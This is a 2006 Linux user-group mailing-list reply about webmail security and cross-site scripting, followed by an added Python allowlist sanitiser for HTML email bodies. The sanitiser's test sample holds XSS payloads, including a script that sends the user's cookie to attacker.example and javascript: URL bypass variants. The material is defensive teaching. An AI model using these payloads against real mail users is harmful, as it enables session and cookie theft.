[Gllug] recommendations for webmail software?

Russell Howe rhowe at siksai.co.uk
Sun Apr 16 22:44:44 UTC 2006


On Thu, Mar 23, 2006 at 11:28:17AM +0000, Minty wrote:
> On 3/23/06, Richard Cohen <vmlinuz at gmail.com> wrote:
> > Yes, so in theory, I'd be happy running a PHP webmail I'd written
> > myself, or one written by someone I actually know and trust to run
> > public-facing code on my machine.
> 
> If you put the php app behind an .htaccess Auth setup, such that they
> would need to login via that before they ever got anywhere near any
> PHP, would that mitigate the security risk enough?
> 
> Might involve logging in twice tho, unless the app in question was
> already setup to integrate with that kind of auth method.

It would mitigate some attacks, and we use this kind of setup at
work, together with mod_proxy, to isolate an IIS server from random IIS
exploits.

What it won't protect you from (and this is very relevant to a webmail
system) is cross-site scripting attacks, where improper parsing of an
email could lead to a malicious email containing embedded
HTML/javascript/etc being executed/(mis-)parsed by the user's browser.

Admittedly, this is a problem common to all webapps, and it requires
quite a rigorous work ethic when programming to avoid creating loopholes
(it's one of those nasties where the bug might be there, but is hardly
noticeable in normal use).

You could take the view that no webmail application is likely to be
secure, and just go for full on eye candy:

http://www.roundcube.net/

(monitoring the security list for the application so that when there is
a hole found, you can go patch)

-- 
Russell Howe       | Why be just another cog in the machine,
rhowe at siksai.co.uk | when you can be the spanner in the works?
-- 
Gllug mailing list  -  Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug
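The point Russell makes above, that HTTP auth in front of the app does nothing about a malicious message rendered into the reader's browser, is what an HTML allowlist sanitiser on the mail body is for. The following is an added example written for this page, not code from any of the webmail packages mentioned in the thread. It uses only the Python standard library (html.parser); the tag and attribute allowlists, the URL scheme allowlist and the sample message MALICIOUS_MAIL are constructed for illustration.

```python
"""Allowlist HTML sanitiser for untrusted e-mail bodies (added example).

Everything not explicitly allowed is dropped: unknown tags, all event
handler attributes, style, and any href/src whose scheme is not
http/https/mailto.  Text content is always re-escaped on output, so the
result can be embedded in the webmail page regardless of what the
sender put in the message.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlists; a real deployment would tune these to its needs.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u", "ul", "ol", "li",
                "blockquote", "a", "img", "div", "span", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
URL_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
# The *content* of these tags is discarded, not just the tags themselves.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed",
                     "title", "noscript"}


def safe_url(value):
    """True for scheme-less (relative) URLs and for allowlisted schemes.

    Browsers ignore tabs/newlines and leading control characters when
    reading a scheme, so strip them first or 'java\\tscript:' slips past.
    """
    cleaned = "".join(c for c in value if ord(c) > 31).strip()
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:          # unparsable URL: treat as unsafe
        return False
    return scheme == "" or scheme in URL_SCHEMES


class EmailSanitiser(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: attribute values arrive already decoded,
        # so '&#106;avascript:' is seen as 'javascript:' like a browser would.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0      # > 0 while inside a DROP_CONTENT tag
        self.open_tags = []      # emitted tags not yet closed

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return               # tag dropped, its text content kept
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue         # drops onerror=, style=, etc.
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    # Treat <br/> like <br>; the default would also call handle_endtag.
    handle_startendtag = handle_starttag

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth -= 1
            return
        if tag in VOID_TAGS or tag not in self.open_tags:
            return
        while self.open_tags:    # close anything left open inside this tag
            opened = self.open_tags.pop()
            self.out.append("</%s>" % opened)
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))

    # Comments, <!DOCTYPE>, and processing instructions are never emitted.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass

    def result(self):
        self.close()
        while self.open_tags:    # balance whatever the sender left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitise_html(body):
    """Return a sanitised copy of an untrusted HTML mail body."""
    parser = EmailSanitiser()
    parser.feed(body)
    return parser.result()


# Constructed sample of a hostile message body, not a real mail.
MALICIOUS_MAIL = (
    '<p>Hi, see the <a href="https://example.com/report">report</a>.</p>'
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href=" JaVaScRiPt:alert(1)">click</a>'
    '<a href="&#106;avascript:alert(2)">entity-encoded</a>'
    '<div style="background:url(javascript:alert(3))">styled</div>'
    '<!-- <script>alert(4)</script> -->'
    '1 &lt; 2 &amp; 3 &gt; 2'
)

if __name__ == "__main__":
    print(sanitise_html(MALICIOUS_MAIL))
```

The sample keeps the legitimate link and image, drops the script block and the comment wholesale, strips onerror and style, and turns both the mixed-case and the entity-encoded javascript: links into plain anchors. This is the part an .htaccess login cannot do for you: the attacker never needs to authenticate, they only need the victim to open the mail.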



